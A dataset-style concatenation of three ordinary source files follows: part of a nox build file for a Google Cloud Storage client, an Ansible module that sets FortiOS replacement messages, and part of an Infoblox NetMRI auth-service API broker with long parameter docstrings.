session.install("flake8", BLACK_VERSION)
session.run(
"black", "--check", *BLACK_PATHS,
)
session.run("flake8", "google", "tests")
@nox.session(python=DEFAULT_PYTHON_VERSION)
def blacken(session):
"""Run black.
Format code to uniform standard.
"""
session.install(BLACK_VERSION)
session.run(
"black", *BLACK_PATHS,
)
@nox.session(python=DEFAULT_PYTHON_VERSION)
def lint_setup_py(session):
"""Verify that setup.py is valid (including RST check)."""
session.install("docutils", "pygments")
session.run("python", "setup.py", "check", "--restructuredtext", "--strict")
def default(session):
constraints_path = str(
CURRENT_DIRECTORY / "testing" / f"constraints-{session.python}.txt"
)
# Install all test dependencies, then install this package in-place.
session.install("mock", "pytest", "pytest-cov", "-c", constraints_path)
session.install("-e", ".", "-c", constraints_path)
# Run py.test against the unit tests.
session.run(
"py.test",
"--quiet",
"--cov=google.cloud.storage",
"--cov=google.cloud",
"--cov=tests.unit",
"--cov-append",
"--cov-config=.coveragerc",
"--cov-report=",
"--cov-fail-under=0",
os.path.join("tests", "unit"),
*session.posargs,
)
@nox.session(python=UNIT_TEST_PYTHON_VERSIONS)
def unit(session):
"""Run the unit test suite."""
default(session)
@nox.session(python=SYSTEM_TEST_PYTHON_VERSIONS)
def system(session):
constraints_path = str(
CURRENT_DIRECTORY / "testing" / f"constraints-{session.python}.txt"
)
"""Run the system test suite."""
system_test_path = os.path.join("tests", "system.py")
system_test_folder_path = os.path.join("tests", "system")
# Check the value of `RUN_SYSTEM_TESTS` env var. It defaults to true.
if os.environ.get("RUN_SYSTEM_TESTS", "true") == "false":
session.skip("RUN_SYSTEM_TESTS is set to false, skipping")
# Environment check: Only run tests if the environment variable is set.
if not os.environ.get("GOOGLE_APPLICATION_CREDENTIALS", ""):
session.skip("Credentials must be set via environment variable")
# mTLS tests requires pyopenssl.
if os.environ.get("GOOGLE_API_USE_CLIENT_CERTIFICATE", "") == "true":
session.install("pyopenssl")
system_test_exists = os.path.exists(system_test_path)
system_test_folder_exists = os.path.exists(system_test_folder_path)
# Environment check: only run tests if found.
if not system_test_exists and not system_test_folder_exists:
session.skip("System tests were not found")
# Use pre-release gRPC for system tests.
session.install("--pre", "grpcio")
# Install all test dependencies, then install this package into the
# virtualenv's dist-packages.
# 2021-05-06: defer installing 'google-cloud-*' to after this package,
# in order to work around Python 2.7 googolapis-common-protos
# issue.
session.install("mock", "pytest", "-c", constraints_path)
session.install("-e", ".", "-c", constraints_path)
session.install(
"google-cloud-testutils",
"google-cloud-iam",
"google-cloud-pubsub < 2.0.0",
"google-cloud-kms < 2.0dev",
"-c",
constraints_path,
)
# Run py.test against the system tests.
if system_test_exists:
session.run("py.test", "--quiet", system_test_path, *session.posargs)
if system_test_folder_exists:
session.run("py.test", "--quiet", system_test_folder_path, *session.posargs)
@nox.session(python=CONFORMANCE_TEST_PYTHON_VERSIONS)
def conftest_retry(session):
"""Run the retry conformance test suite."""
conformance_test_path = os.path.join("tests", "conformance.py")
conformance_test_folder_path = os.path.join("tests", "conformance")
conformance_test_exists = os.path.exists(conformance_test_path)
conformance_test_folder_exists = os.path.exists(conformance_test_folder_path)
# Environment check: only run tests if found.
if not conformance_test_exists and not conformance_test_folder_exists:
session.skip("Conformance tests were not found")
session.install("pytest",)
session.install("-e", ".")
# Run py.test against the conformance tests.
if conformance_test_exists:
session.run("py.test", "--quiet", conformance_test_path, *session.posargs)
if conformance_test_folder_exists:
session.run(
"py.test", "--quiet", conformance_test_folder_path, *session.posargs
)
@nox.session(python=DEFAULT_PYTHON_VERSION)
def cover(session):
"""Run the final coverage report.
This outputs the coverage report aggregating coverage from the unit
test runs (not system test runs), and then erases coverage data.
"""
session.install("coverage", "pytest-cov")
session.run("coverage", "report", "--show-missing", "--fail-under=100")
session.run("coverage", "erase")
@nox.session(python=DEFAULT_PYTHON_VERSION)
def docs(session):
"""Build the docs for this library."""
session.install("-e", ".")
session.install("sphinx==4.0.1", "alabaster", "recommonmark")
shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True)
session.run(
"sphinx-build",
"-W", # warnings as errors
"-T", # show full traceback on exception
"-N", # no colors
"-b",
"html",
"-d",
os.path.join("docs", "_build", "doctrees", ""),
os.path.join("docs", ""),
os.path.join("docs", "_build", "html", ""),
)
@nox.session(python=DEFAULT_PYTHON_VERSION)
def docfx(session):
"""Build the docfx yaml files for this library."""
session.install("-e", ".")
session.install("grpcio")
session.install(
"sphinx==4.0.1", "alabaster", "recommonmark", "gcp-sphinx-docfx-yaml"
)
shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True)
session.run(
"sphinx-build",
"-T", # show full traceback on exception
"-N", # no colors
"-D",
(
"extensions=sphinx.ext.autodoc,"
"sphinx.ext.autosummary,"
"docfx_yaml.extension,"
"sphinx.ext.intersphinx,"
"sphinx.ext.coverage,"
"sphinx.ext.napoleon,"
"sphinx.ext.todo,"
"sphinx.ext.viewcode,"
"recommonmark"
),
"-b",
"html",
"-d",
os.path.join("docs", "_build", "doctrees", ""),
os.path.join("docs", ""),
os.path.join("docs", "_build", "html", ""),
)
| 32.666667
| 84
| 0.649701
|
d503dd6dc640f3e0a5c6e46789b1889d3cd56e2f
| 10,031
|
py
|
Python
|
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_replacemsg_ec.py
|
gvashchenkolineate/gvashchenkolineate_infra_trytravis
|
0fb18850afe0d8609693ba4b23f29c7cda17d97f
|
[
"MIT"
] | 17
|
2017-06-07T23:15:01.000Z
|
2021-08-30T14:32:36.000Z
|
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_replacemsg_ec.py
|
gvashchenkolineate/gvashchenkolineate_infra_trytravis
|
0fb18850afe0d8609693ba4b23f29c7cda17d97f
|
[
"MIT"
] | 32
|
2018-10-09T04:13:42.000Z
|
2020-05-11T07:20:28.000Z
|
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_replacemsg_ec.py
|
gvashchenkolineate/gvashchenkolineate_infra_trytravis
|
0fb18850afe0d8609693ba4b23f29c7cda17d97f
|
[
"MIT"
] | 11
|
2018-10-09T00:14:53.000Z
|
2021-11-03T10:54:09.000Z
|
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_system_replacemsg_ec
short_description: Replacement messages in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the
user to set and modify system_replacemsg feature and ec category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.9"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
state:
description:
- Indicates whether to create or remove the object.
type: str
required: true
choices:
- present
- absent
system_replacemsg_ec:
description:
- Replacement messages.
default: null
type: dict
suboptions:
buffer:
description:
- Message string.
type: str
format:
description:
- Format flag.
type: str
choices:
- none
- text
- html
- wml
header:
description:
- Header flag.
type: str
choices:
- none
- http
- 8bit
msg_type:
description:
- Message type.
type: str
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Replacement messages.
fortios_system_replacemsg_ec:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
state: "present"
system_replacemsg_ec:
buffer: "<your_own_value>"
format: "none"
header: "none"
msg_type: "<your_own_value>"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
ssl_verify = data['ssl_verify']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password, verify=ssl_verify)
def filter_system_replacemsg_ec_data(json):
option_list = ['buffer', 'format', 'header',
'msg_type']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def underscore_to_hyphen(data):
if isinstance(data, list):
for elem in data:
elem = underscore_to_hyphen(elem)
elif isinstance(data, dict):
new_data = {}
for k, v in data.items():
new_data[k.replace('_', '-')] = underscore_to_hyphen(v)
data = new_data
return data
def system_replacemsg_ec(data, fos):
vdom = data['vdom']
state = data['state']
system_replacemsg_ec_data = data['system_replacemsg_ec']
filtered_data = underscore_to_hyphen(filter_system_replacemsg_ec_data(system_replacemsg_ec_data))
if state == "present":
return fos.set('system.replacemsg',
'ec',
data=filtered_data,
vdom=vdom)
elif state == "absent":
return fos.delete('system.replacemsg',
'ec',
mkey=filtered_data['msg-type'],
vdom=vdom)
def is_successful_status(status):
return status['status'] == "success" or \
status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_system_replacemsg(data, fos):
if data['system_replacemsg_ec']:
resp = system_replacemsg_ec(data, fos)
return not is_successful_status(resp), \
resp['status'] == "success", \
resp
def main():
fields = {
"host": {"required": False, "type": "str"},
"username": {"required": False, "type": "str"},
"password": {"required": False, "type": "str", "default": "", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"ssl_verify": {"required": False, "type": "bool", "default": True},
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"system_replacemsg_ec": {
"required": False, "type": "dict", "default": None,
"options": {
"buffer": {"required": False, "type": "str"},
"format": {"required": False, "type": "str",
"choices": ["none", "text", "html",
"wml"]},
"header": {"required": False, "type": "str",
"choices": ["none", "http", "8bit"]},
"msg_type": {"required": False, "type": "str"}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
# legacy_mode refers to using fortiosapi instead of HTTPAPI
legacy_mode = 'host' in module.params and module.params['host'] is not None and \
'username' in module.params and module.params['username'] is not None and \
'password' in module.params and module.params['password'] is not None
if not legacy_mode:
if module._socket_path:
connection = Connection(module._socket_path)
fos = FortiOSHandler(connection)
is_error, has_changed, result = fortios_system_replacemsg(module.params, fos)
else:
module.fail_json(**FAIL_SOCKET_MSG)
else:
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
login(module.params, fos)
is_error, has_changed, result = fortios_system_replacemsg(module.params, fos)
fos.logout()
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| 29.502941
| 101
| 0.596152
|
2cc24ce40dd0be5944ef45c17b02b7192f49653a
| 59,189
|
py
|
Python
|
infoblox_netmri/api/broker/v3_6_0/auth_service_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/auth_service_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/auth_service_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..broker import Broker
class AuthServiceBroker(Broker):
controller = "auth_services"
def show(self, **kwargs):
"""Shows the details for the specified auth service.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The id of the authentication service.
:type id: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return auth_service: The auth service identified by the specified id.
:rtype auth_service: AuthService
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available auth services. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The id of the authentication service.
:type id: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each AuthService. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return auth_services: An array of the AuthService objects that match the specified input criteria.
:rtype auth_services: Array of AuthService
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available auth services matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param auth_method: The Authentication method of the service. One of (local, radius, tacacs, ldap, activedirectory).
:type auth_method: Array of String
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param context_params_json: Additional specific authentication method parameters are stored in this field using a json format. (such as 'base_dn' for LDAP method, Vendor Specific Attribute ID for Radius,...).
:type context_params_json: Array of String
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param created_at: The date and time the record was initially created in NetMRI.
:type created_at: Array of DateTime
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param description: Description/comment about this authentication service
:type description: Array of String
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param enabled_authz_ind: A flag indicating whether this service is used for computing privileges for the remote users.
:type enabled_authz_ind: Array of Boolean
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param enabled_ind: A flag indicating whether the authentication service settings is enabled or disabled.
:type enabled_ind: Array of Boolean
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The id of the authentication service.
:type id: Array of Integer
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param priority: The priority assigned to this Authentication Service.
:type priority: Array of Integer
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param service_name: The name of the Authentication Service.
:type service_name: Array of String
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timeout: The timeout interval of the service authentication servers.
:type timeout: Array of Integer
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param updated_at: The date and time the record was last modified in NetMRI.
:type updated_at: Array of DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each AuthService. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against auth services, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: auth_method, context_params_json, created_at, description, enabled_authz_ind, enabled_ind, id, priority, service_name, timeout, updated_at.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return auth_services: An array of the AuthService objects that match the specified input criteria.
:rtype auth_services: Array of AuthService
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available auth services matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: auth_method, context_params_json, created_at, description, enabled_authz_ind, enabled_ind, id, priority, service_name, timeout, updated_at.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_auth_method: The operator to apply to the field auth_method. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. auth_method: The Authentication method of the service. One of (local, radius, tacacs, ldap, activedirectory). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_auth_method: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_auth_method: If op_auth_method is specified, the field named in this input will be compared to the value in auth_method using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_auth_method must be specified if op_auth_method is specified.
:type val_f_auth_method: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_auth_method: If op_auth_method is specified, this value will be compared to the value in auth_method using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_auth_method must be specified if op_auth_method is specified.
:type val_c_auth_method: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_context_params_json: The operator to apply to the field context_params_json. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. context_params_json: Additional specific authentication method parameters are stored in this field using a json format. (such as 'base_dn' for LDAP method, Vendor Specific Attribute ID for Radius,...). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_context_params_json: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_context_params_json: If op_context_params_json is specified, the field named in this input will be compared to the value in context_params_json using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_context_params_json must be specified if op_context_params_json is specified.
:type val_f_context_params_json: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_context_params_json: If op_context_params_json is specified, this value will be compared to the value in context_params_json using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_context_params_json must be specified if op_context_params_json is specified.
:type val_c_context_params_json: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_created_at: The operator to apply to the field created_at. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. created_at: The date and time the record was initially created in NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_created_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_created_at: If op_created_at is specified, the field named in this input will be compared to the value in created_at using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_created_at must be specified if op_created_at is specified.
:type val_f_created_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_created_at: If op_created_at is specified, this value will be compared to the value in created_at using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_created_at must be specified if op_created_at is specified.
:type val_c_created_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_description: The operator to apply to the field description. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. description: Description/comment about this authentication service For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_description: If op_description is specified, the field named in this input will be compared to the value in description using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_description must be specified if op_description is specified.
:type val_f_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_description: If op_description is specified, this value will be compared to the value in description using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_description must be specified if op_description is specified.
:type val_c_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_enabled_authz_ind: The operator to apply to the field enabled_authz_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. enabled_authz_ind: A flag indicating whether this service is used for computing privileges for the remote users. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_enabled_authz_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_enabled_authz_ind: If op_enabled_authz_ind is specified, the field named in this input will be compared to the value in enabled_authz_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_enabled_authz_ind must be specified if op_enabled_authz_ind is specified.
:type val_f_enabled_authz_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_enabled_authz_ind: If op_enabled_authz_ind is specified, this value will be compared to the value in enabled_authz_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_enabled_authz_ind must be specified if op_enabled_authz_ind is specified.
:type val_c_enabled_authz_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_enabled_ind: The operator to apply to the field enabled_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. enabled_ind: A flag indicating whether the authentication service settings is enabled or disabled. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_enabled_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_enabled_ind: If op_enabled_ind is specified, the field named in this input will be compared to the value in enabled_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_enabled_ind must be specified if op_enabled_ind is specified.
:type val_f_enabled_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_enabled_ind: If op_enabled_ind is specified, this value will be compared to the value in enabled_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_enabled_ind must be specified if op_enabled_ind is specified.
:type val_c_enabled_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_id: The operator to apply to the field id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. id: The id of the authentication service. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_id: If op_id is specified, the field named in this input will be compared to the value in id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_id must be specified if op_id is specified.
:type val_f_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_id: If op_id is specified, this value will be compared to the value in id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_id must be specified if op_id is specified.
:type val_c_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_priority: The operator to apply to the field priority. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. priority: The priority assigned to this Authentication Service. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_priority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_priority: If op_priority is specified, the field named in this input will be compared to the value in priority using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_priority must be specified if op_priority is specified.
:type val_f_priority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_priority: If op_priority is specified, this value will be compared to the value in priority using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_priority must be specified if op_priority is specified.
:type val_c_priority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_service_name: The operator to apply to the field service_name. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. service_name: The name of the Authentication Service. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_service_name: If op_service_name is specified, the field named in this input will be compared to the value in service_name using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_service_name must be specified if op_service_name is specified.
:type val_f_service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_service_name: If op_service_name is specified, this value will be compared to the value in service_name using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_service_name must be specified if op_service_name is specified.
:type val_c_service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_timeout: The operator to apply to the field timeout. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. timeout: The timeout interval of the service authentication servers. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_timeout: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
